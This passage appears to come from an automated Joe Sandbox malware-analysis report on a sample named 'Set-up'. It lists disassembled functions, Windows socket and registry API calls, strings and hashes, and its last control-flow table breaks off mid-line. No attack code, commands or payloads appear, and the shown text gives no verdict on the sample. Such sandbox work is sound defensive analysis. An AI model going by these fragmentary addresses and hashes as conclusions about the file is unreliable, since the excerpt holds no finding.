                            • Opcode Fuzzy Hash: dc761a054bbea0350f80fc633b0e6d14a4ab917ceb03d89cc17d060133deda80
                            • Instruction Fuzzy Hash: EA415BB09083059FCB00EFB9D84966EBBF0EF48314F408A6DE854D7260E734D945CB96

                            Control-flow Graph

                            Strings
                            • error CryptGenRandom 0x%08lx, xrefs: 00C908A9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID: error CryptGenRandom 0x%08lx
                            • API String ID: 0-1222942552
                            • Opcode ID: e2cfb6c8b10a742966fd06a6769a053767d0e9e3d8c9552ec4dc334555469c56
                            • Instruction ID: 9e01e6b524dbde8cf297182b79ad91c7a603e5b091015562ec0dea918c73195a
                            • Opcode Fuzzy Hash: e2cfb6c8b10a742966fd06a6769a053767d0e9e3d8c9552ec4dc334555469c56
                            • Instruction Fuzzy Hash: 8B41C4B59093019FCB00EF79D58961ABBE0AB88314F408E6DF898D7364E774D589CF82

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1246 8105b0-8105b7 1247 8105bd-8105d4 1246->1247 1248 8107ee 1246->1248 1249 8107e7-8107ed 1247->1249 1250 8105da-8105e6 1247->1250 1249->1248 1250->1249 1251 8105ec-8105f0 1250->1251 1252 8107c7-8107cc 1251->1252 1253 8105f6-810620 call 817350 call 8070b0 1251->1253 1252->1249 1258 810622-810624 1253->1258 1259 81066a-81068c call 83dec0 1253->1259 1261 810630-810655 call 8070d0 call 8103c0 call 817450 1258->1261 1264 810692-8106a0 1259->1264 1265 8107d6-8107e3 call 817380 1259->1265 1285 81065b-810668 call 8070e0 1261->1285 1286 8107ce 1261->1286 1268 8106a2-8106a4 1264->1268 1269 8106f4-8106f6 1264->1269 1265->1249 1275 8106b0-8106e4 call 8173b0 1268->1275 1272 8106fc-8106fe 1269->1272 1273 8107ef-81082b call 813000 1269->1273 1277 81072c-810754 1272->1277 1289 810831-810837 1273->1289 1290 810a2f-810a35 1273->1290 1275->1265 1293 8106ea-8106ee 1275->1293 1281 810756-81075b 1277->1281 1282 81075f-81078b getsockopt 1277->1282 1287 810707-810719 WSAEventSelect 1281->1287 1288 81075d 1281->1288 1291 810791-810796 1282->1291 1292 810700-810703 1282->1292 1285->1259 1285->1261 1286->1265 1287->1265 1295 81071f 1287->1295 1298 810723-810726 1288->1298 1299 810861-81087e WSAWaitForMultipleEvents 1289->1299 1300 810839-81084c call 816fa0 1289->1300 1296 810a37-810a3a 1290->1296 1297 810a3c-810a52 1290->1297 1291->1292 1301 81079c-8107c2 call 8076a0 1291->1301 1292->1287 1293->1275 1302 8106f0 1293->1302 1295->1298 1296->1297 1297->1265 1304 810a58-810a81 call 812f10 1297->1304 1298->1273 1298->1277 1307 810882-81088d 1299->1307 1317 810852 1300->1317 1318 810a9c-810aa4 1300->1318 1301->1292 1302->1269 1304->1265 1322 810a87-810a97 call 816df0 1304->1322 1308 810970-810975 1307->1308 1309 810893-8108b1 1307->1309 1314 810a19-810a2c WSAResetEvent 1308->1314 1315 81097b-810989 call 8070b0 1308->1315 1313 8108c8-8108f7 WSAEnumNetworkEvents 1309->1313 1319 8108f9-8108fb 1313->1319 1320 8108fd-810925 1313->1320 1314->1290 1315->1314 1329 81098f-81099e 1315->1329 1317->1299 1323 810854-81085f 1317->1323 1318->1265 1324 810928-81093f WSAEventSelect 1319->1324 1320->1324 1322->1265 1323->1307 1327 8108b3-8108c2 1324->1327 1328 810945-81096b 1324->1328 1327->1308 1327->1313 1328->1327 1331 8109b0-8109c1 call 8070d0 1329->1331 1334 8109a0-8109ae call 8070e0 1331->1334 1335 8109c3-8109c7 1331->1335 1334->1314 1334->1331 1336 8109e8-810a03 WSAEnumNetworkEvents 1335->1336 1338 8109d0-8109e6 WSAEventSelect 1336->1338 1339 810a05-810a17 1336->1339 1338->1334 1338->1336 1339->1338
                            APIs
                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00810711
                            • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00810783
                            • WSAWaitForMultipleEvents.WS2_32(00000001,00803EBE,00000000,00000000,00000000), ref: 0081086F
                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008108EF
                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00810934
                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008109DC
                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008109FB
                            • WSAResetEvent.WS2_32(8508C483), ref: 00810A1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                            • String ID: multi.c
                            • API String ID: 3264668090-214371023
                            • Opcode ID: 43f3bdbba4865c0a14134f8c4692b79f1c0114fc5576689b7c6656d8bcc4e450
                            • Instruction ID: 2ef4ee963410370c960052420120bf77719ae4d6e37c0877218a4e0d4944d5eb
                            • Opcode Fuzzy Hash: 43f3bdbba4865c0a14134f8c4692b79f1c0114fc5576689b7c6656d8bcc4e450
                            • Instruction Fuzzy Hash: DFD17B756083059BE7108F64CC81BAABBE9FF94308F04482CF885D6292E7B5E9D5CF52
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 499d69d0a434f1ed214879c3956a9defb603e046a3a28390d3542018b48fb2f2
                            • Instruction ID: 137dea8bd3e36bb73b8e910a3d1edfbd6e1f59f4bc6fea55a9e32653a3b0fa64
                            • Opcode Fuzzy Hash: 499d69d0a434f1ed214879c3956a9defb603e046a3a28390d3542018b48fb2f2
                            • Instruction Fuzzy Hash: EF91E3306087499BD7358A2988847FA72F9FFC4324F548A2CE8AAC31D4EB709DC1D681
                            APIs
                            • Sleep.KERNEL32 ref: 008011B7
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
                            • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
                            • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
                            • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080140C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                            • String ID:
                            • API String ID: 1209083157-0
                            • Opcode ID: 232a0fdbf67440227f36a7e64482b02f528cc8f03b52d3dbc1bc139d499c05db
                            • Instruction ID: 509eb588e46b2a43f0223274ec13335bc79c73866847939c3ceb155d0ef29a33
                            • Opcode Fuzzy Hash: 232a0fdbf67440227f36a7e64482b02f528cc8f03b52d3dbc1bc139d499c05db
                            • Instruction Fuzzy Hash: E14127B0A083088FDB54EF65E98835DBBE1FB44710F05442DD945EB3A0DB749849CF81
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
                            • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
                            • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
                              • Part of subcall function 00B88A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,008013EF), ref: 00B88A2A
                            • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080140C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                            • String ID:
                            • API String ID: 2715571461-0
                            • Opcode ID: 9a86179ef5dfc96cee676cf3c925c64a4b34024f62233d8abd23b48c12372648
                            • Instruction ID: b3c480bc2c6172b376f082f407b6c62112c3728e50c94d8fbb85b2942b89865b
                            • Opcode Fuzzy Hash: 9a86179ef5dfc96cee676cf3c925c64a4b34024f62233d8abd23b48c12372648
                            • Instruction Fuzzy Hash: 094138B19093088FDB54EF65E98935DBBE1FB44310F10486DD985A73A1DB749849CF82
                            APIs
                            • Sleep.KERNEL32 ref: 008011B7
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00801238
                            • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080124D
                            • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00801261
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
                            • GetStartupInfoA.KERNEL32 ref: 00801433
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                            • String ID:
                            • API String ID: 3873122205-0
                            • Opcode ID: 9f4c5c1b36d4e3c844f3da8fa5eb619ce1158a07fe8df7c2cb0ec8f5515bb6cd
                            • Instruction ID: 3211adb7a03abafc40f8cab1dba531cdbefa2f2e1ebfa2773ac31cff93741eb1
                            • Opcode Fuzzy Hash: 9f4c5c1b36d4e3c844f3da8fa5eb619ce1158a07fe8df7c2cb0ec8f5515bb6cd
                            • Instruction Fuzzy Hash: 90517A71A047088FDB54EF65ED8975ABBE1FB48710F14452DE945EB3A0DB30A849CF81
                            APIs
                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 008CA90C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: recvfrom
                            • String ID:
                            • API String ID: 846543921-0
                            • Opcode ID: 49e47e79600c29216ced42f76259e2dce47a1392259511c01a667ab2b08bd962
                            • Instruction ID: 31b6f84236332e0c4a0a318b121f51848b063996d72faa14caf6ff777a1a621a
                            • Opcode Fuzzy Hash: 49e47e79600c29216ced42f76259e2dce47a1392259511c01a667ab2b08bd962
                            • Instruction Fuzzy Hash: 99F0497510820CAFD2109F01EC88EABBBBDFBC9758F05456DF958632118270AE14CA72
                            APIs
                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA499
                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA4FB
                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 008BA531
                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008BAA19
                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BAA4C
                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 008BAA97
                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008BAAE9
                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008BAB30
                            • RegCloseKey.KERNELBASE(?), ref: 008BAB6A
                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 008BAB82
                            • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BABAD
                            • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BABF0
                            • RegCloseKey.ADVAPI32(?), ref: 008BAC2A
                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 008BAC46
                            • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 008BAC71
                            • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 008BACB4
                            • RegCloseKey.ADVAPI32(?), ref: 008BACEE
                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 008BAD0A
                            • RegEnumKeyExA.KERNELBASE ref: 008BAD8D
                            • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 008BADB0
                            • RegCloseKey.KERNELBASE(?), ref: 008BADD9
                            • RegEnumKeyExA.KERNELBASE ref: 008BAE08
                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 008BAE2A
                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008BAE54
                            • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 008BAEA3
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008BAF18
                            • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 008BAF2C
                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008BAF63
                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008BAFB2
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008BB027
                            • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 008BB03B
                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 008BB072
                            • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 008BB0C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
                            • API String ID: 1856363200-4239849775
                            • Opcode ID: a3fb0e2dd2d495375d6e9154ac100f51310840e4e43d2ab1fc9a74ca53dd25c4
                            • Instruction ID: cc7a6dc572df8bd500c93ff9c03f23d3ee9458774c6d15a77d6ff1fdab25c52e
                            • Opcode Fuzzy Hash: a3fb0e2dd2d495375d6e9154ac100f51310840e4e43d2ab1fc9a74ca53dd25c4
                            • Instruction Fuzzy Hash: 4182ACB1604301AFE7249B25DC85BAB7BE8FF85700F144828F985E73A1E771E949CB52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 602 8c9740-8c975b 603 8c975d-8c9768 call 8c78a0 602->603 604 8c9780-8c9782 602->604 613 8c976e-8c9770 603->613 614 8c99bb-8c99c0 603->614 606 8c9788-8c97a0 getenv call 8c78a0 604->606 607 8c9914-8c994e memset RegOpenKeyExA 604->607 606->614 617 8c97a6-8c97c5 _stat64 606->617 609 8c995a-8c99ab RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen call 8c78a0 607->609 610 8c9950-8c9955 607->610 619 8c99b0-8c99b5 609->619 615 8c9a0c-8c9a15 610->615 613->617 618 8c9772-8c977e 613->618 614->615 620 8c9827-8c9833 617->620 621 8c97c7-8c97e0 617->621 618->606 619->614 619->617 624 8c985f-8c9872 call 8c5ca0 620->624 625 8c9835-8c985c call 8be2b0 * 2 620->625 622 8c97f6-8c9809 _stricmp 621->622 623 8c97e2-8c97f3 _time64 621->623 622->620 627 8c980b-8c9810 622->627 623->622 632 8c9878-8c987d call 8c77b0 624->632 633 8c99f0 624->633 625->624 627->620 630 8c9812-8c9822 627->630 630->615 639 8c9882-8c9889 632->639 636 8c99f5-8c99fb call 8c5d00 633->636 646 8c99fe-8c9a09 636->646 639->636 643 8c988f-8c989b call 8b4fe0 639->643 643->633 649 8c98a1-8c98c3 _time64 call 8c78a0 643->649 646->615 653 8c98c9-8c98db call 8be2d0 649->653 654 8c99c2-8c99ed call 8be2b0 * 2 649->654 653->654 658 8c98e1-8c98f0 call 8be2d0 653->658 654->633 658->654 664 8c98f6-8c9905 call 8c63f0 658->664 669 8c990b-8c990f 664->669 670 8c9f66-8c9f7f call 8c5d00 664->670 671 8c9a3f-8c9a5a call 8c6740 call 8c63f0 669->671 670->646 671->670 678 8c9a60-8c9a6e call 8c6d60 671->678 681 8c9a1f-8c9a39 call 8c6840 call 8c63f0 678->681 682 8c9a70-8c9a94 call 8c6200 call 8c67e0 call 8c6320 678->682 681->670 681->671 693 8c9a16-8c9a19 682->693 694 8c9a96-8c9ac6 call 8bd120 682->694 693->681 695 8c9fc1 693->695 699 8c9ac8-8c9adb call 8bd120 694->699 700 8c9ae1-8c9af7 call 8bd190 694->700 698 8c9fc5-8c9ffd call 8c5d00 call 8be2b0 * 2 695->698 698->646 699->681 699->700 700->681 708 8c9afd-8c9b09 call 8b4fe0 700->708 708->695 713 8c9b0f-8c9b29 call 8be730 708->713 718 8c9b2f-8c9b3a call 8c78a0 713->718 719 8c9f84-8c9f88 